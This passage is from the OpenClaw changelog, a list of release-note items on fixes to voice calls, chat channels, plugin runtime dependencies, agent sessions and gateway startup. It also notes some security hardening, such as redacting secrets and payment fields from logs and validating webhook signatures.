<li>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</li>
<li>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</li>
<li>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</li>
<li>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</li>
<li>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</li>
<li>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</li>
<li>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</li>
<li>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</li>
<li>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</li>
<li>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</li>
<li>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</li>
<li>Agents/media: keep async music generation completions on the requester-session wake path even when direct-send completion is enabled, so finished audio stays agent-mediated while video can still opt into direct channel delivery. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362275213" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75335" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75335/hovercard" href="https://github.com/openclaw/openclaw/pull/75335">#75335</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Security/config-audit: redact CLI argv and execArgv secrets before persisting config audit records, covering write, observe, and recovery paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204612186" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60826" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60826/hovercard" href="https://github.com/openclaw/openclaw/issues/60826">#60826</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/koshaji/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/koshaji">@koshaji</a>.</li>
<li>Gateway/models: keep default and configured model-list views responsive when provider catalog discovery stalls, without hiding real catalog load failures, while <code>--all</code> still waits for the exact full catalog. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351397259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74404/hovercard" href="https://github.com/openclaw/openclaw/issues/74404">#74404</a>. Thanks @lisandromachado and @najef1979-code.</li>
<li>Plugins/runtime-deps: accept already materialized package-level runtime-deps supersets as converged, so later lazy plugin activation no longer prunes and relaunches <code>pnpm install</code> after gateway startup pre-staging, reducing event-loop pressure from repeated runtime-deps repair on packaged installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361752617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75297" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75297/hovercard" href="https://github.com/openclaw/openclaw/issues/75297">#75297</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331750102" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72338" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72338/hovercard" href="https://github.com/openclaw/openclaw/issues/72338">#72338</a>. Thanks @brokemac79, @lisandromachado, and @midhunmonachan.</li>
<li>Plugins/runtime-deps: remove OpenClaw-owned legacy runtime-deps symlinks before replacing staged bundled plugin dependencies, so updates can recover from older symlinked installs instead of failing the symlink safety guard. Thanks @goldmar.</li>
<li>Discord: retry queued REST 429s against learned bucket/global cooldowns and reacquire fresh voice upload URLs after CDN upload rate limits, so outbound sends recover without reusing stale single-use upload URLs. Thanks @discord.</li>
<li>TTS/providers: keep bundled speech-provider compat fallback available when plugins are globally disabled, so cold gateway and CLI startup can still resolve fallback speech providers instead of leaving explicit TTS provider selection with no registered providers. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361272168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75265" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75265/hovercard" href="https://github.com/openclaw/openclaw/pull/75265">#75265</a>. Thanks @sliekens.</li>
<li>Discord: collapse repeated native slash-command deploy rate-limit startup logs into one non-fatal warning while keeping per-request REST timing in verbose output. Thanks @discord.</li>
<li>Discord: report native slash-command deploy aborts as REST timeouts with method, path, timeout budget, and observed duration, so startup logs explain slow Discord API calls instead of showing a generic aborted operation. Thanks @discord.</li>
<li>Security/logging: redact payment credential field names such as card number, CVC/CVV, shared payment token, and payment credential across default log and tool-payload redaction patterns so wallet-style MCP tools do not expose raw payment credentials in UI events or transcripts. Thanks @stainlu.</li>
<li>Providers/OpenAI Codex: preserve existing wrapped Codex streams during OpenAI attribution so PI OAuth bearer injection reaches ChatGPT/Codex Responses, and strip native Codex-only unsupported payload fields without touching custom compatible endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358840684" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75111" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75111/hovercard" href="https://github.com/openclaw/openclaw/pull/75111">#75111</a>) Thanks @keshavbotagent.</li>
<li>Plugins/runtime-deps: materialize newly required bundled plugin packages after local <code>openclaw onboard</code> and <code>openclaw configure</code> config writes, while keeping remote setup read-only, so first Gateway startup no longer discovers missing channel/provider deps after setup claimed success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @scottgl9 and @xiaohuaxi.</li>
<li>Plugins/runtime-deps: expire stale legacy install locks whose live PID cannot be tied to the current process incarnation, so Docker PID reuse no longer leaves bundled dependency repair stuck behind old <code>.openclaw-runtime-deps.lock</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356320468" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74948" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74948/hovercard" href="https://github.com/openclaw/openclaw/issues/74948">#74948</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356328081" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74950" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74950/hovercard" href="https://github.com/openclaw/openclaw/pull/74950">#74950</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350782800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74346" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74346/hovercard" href="https://github.com/openclaw/openclaw/issues/74346">#74346</a>. Thanks @dchekmarev.</li>
<li>Plugins/runtime-deps: recover interrupted bundled runtime-dependency installs whose package sentinels exist but generated materialization is incomplete, forcing npm/pnpm repair in Gateway startup, doctor, and lazy plugin loads instead of leaving channels crash-looping on missing packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361991170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75310/hovercard" href="https://github.com/openclaw/openclaw/pull/75310">#75310</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361740220" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75296" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75296/hovercard" href="https://github.com/openclaw/openclaw/issues/75296">#75296</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361883653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75304" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75304/hovercard" href="https://github.com/openclaw/openclaw/issues/75304">#75304</a>. Thanks @scottgl9.</li>
<li>Plugins/runtime-deps: treat no-main and export-map package sentinels without reachable entry files as incomplete, so Gateway startup, doctor, and lazy plugin loads repair interrupted bundled dependency installs instead of accepting package.json-only partial installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361989933" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75309" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75309/hovercard" href="https://github.com/openclaw/openclaw/issues/75309">#75309</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/runtime-deps: keep runtime inspection and channel maintenance commands from downloading bundled plugin dependencies, route explicit repairs through <code>openclaw plugins deps --repair</code>, and still allow Gateway/DO paths to repair missing deps before import. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @xiaohuaxi.</li>
<li>Updates: force non-deferred, no-cooldown update restarts after package-manager updates requested through the live Gateway control plane and fail release validation on post-swap stale chunk import crashes, so Telegram/Discord imports do not stay pointed at removed dist files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360403986" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75206" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75206/hovercard" href="https://github.com/openclaw/openclaw/issues/75206">#75206</a>. Thanks @xonaman and @faux123.</li>
<li>Agents/tool-result guard: use the resolved runtime context token budget for non-context-engine tool-result overflow checks, so long tool-heavy sessions no longer compact early when <code>contextTokens</code> is larger than native <code>contextWindow</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355916636" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74917" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74917/hovercard" href="https://github.com/openclaw/openclaw/issues/74917">#74917</a>. Thanks @kAIborg24.</li>
<li>Gateway/systemd: exit with sysexits 78 for supervised lock and <code>EADDRINUSE</code> conflicts so <code>RestartPreventExitStatus=78</code> stops <code>Restart=always</code> restart loops instead of repeatedly reloading plugins against an occupied port. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358976301" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75115" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75115/hovercard" href="https://github.com/openclaw/openclaw/issues/75115">#75115</a>. Thanks @yhyatt.</li>
<li>Agents/runtime: skip blank visible user prompts at the embedded-runner boundary before provider submission while still allowing internal runtime-only turns and media-only prompts, so Telegram/group sessions no longer leak raw empty-input provider errors when replay history exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348363760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74137" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74137/hovercard" href="https://github.com/openclaw/openclaw/issues/74137">#74137</a>. Thanks @yelog, @Gracker, and @nhaener.</li>
<li>Agents/Codex: isolate local Codex app-server <code>CODEX_HOME</code> and <code>HOME</code> per agent and add a deliberate Codex migration path with selectable skill copies, so personal Codex CLI skills, plugins, config, and hooks no longer leak into OpenClaw agents unless the operator migrates them into the workspace. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Security/Nextcloud Talk: make webhook signature validation use the padded timing-safe compare path even when the supplied signature length is wrong, keep normalized header lookup behavior, and extend regression coverage for tampered bodies, wrong secrets, array-backed headers, and truncated signatures. Carries forward earlier contributor work from <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102742606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50516/hovercard" href="https://github.com/openclaw/openclaw/pull/50516">#50516</a> by teddytennant. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175383760" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58097" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58097/hovercard" href="https://github.com/openclaw/openclaw/pull/58097">#58097</a>) Thanks @gavyngong.</li>
<li>Plugins/runtime-deps: replace stale symlinked mirror target roots before writing runtime-mirror temp files and skip rewriting already materialized hardlinks, so cross-version container upgrades no longer crash-loop on read-only image-layer paths while warm mirrors do less churn. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358776355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75108" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75108/hovercard" href="https://github.com/openclaw/openclaw/issues/75108">#75108</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coletebou/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coletebou">@coletebou</a> and @xiaohuaxi.</li>
<li>Auto-reply/group chats: fall back to automatic source delivery when a channel precomputes message-tool-only replies but the <code>message</code> tool is unavailable, so Discord/Slack-style group turns do not silently complete without a visible reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355462791" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74868" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74868/hovercard" href="https://github.com/openclaw/openclaw/issues/74868">#74868</a>. Thanks @kagura-agent.</li>
<li>Browser/gateway: share one browser control runtime across the HTTP control server and <code>browser.request</code>, and refresh browser profile config from the source snapshot, so CLI status/start honors configured <code>browser.executablePath</code>, <code>headless</code>, and <code>noSandbox</code> instead of falling back to stale auto-detection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358368287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75087" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75087/hovercard" href="https://github.com/openclaw/openclaw/issues/75087">#75087</a>; repairs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344146532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73617/hovercard" href="https://github.com/openclaw/openclaw/issues/73617">#73617</a>. Thanks @civiltox and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</li>
<li>Agents/subagents: bound automatic orphan recovery with persisted recovery attempts and a wedged-session tombstone, and teach task maintenance/doctor to reconcile those sessions so restart loops no longer require manual <code>sessions.json</code> surgery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355427349" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74864/hovercard" href="https://github.com/openclaw/openclaw/issues/74864">#74864</a>. Thanks @solosage1.</li>
<li>Plugins/runtime-deps: keep bundled provider policy config loading from staging plugin runtime dependencies, so config reads no longer fail on locked-down <code>/var/lib/openclaw/plugin-runtime-deps</code> directories. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356579392" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74971" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74971/hovercard" href="https://github.com/openclaw/openclaw/issues/74971">#74971</a>. Thanks @eurojojo.</li>
<li>Memory/runtime-deps: retain the native <code>node-llama-cpp</code> runtime only when local memory search is configured, so packaged installs can repair local embeddings without relying on unreachable global npm installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355063600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74777/hovercard" href="https://github.com/openclaw/openclaw/issues/74777">#74777</a>. Thanks @LLagoon3.</li>
<li>Gateway/startup: skip pre-bind web-fetch provider discovery for credential-free <code>tools.web.fetch</code> config, so Docker/Kubernetes gateways bind even when optional fetch limits are present. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355733598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74896" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74896/hovercard" href="https://github.com/openclaw/openclaw/issues/74896">#74896</a>. Thanks @KoykL.</li>
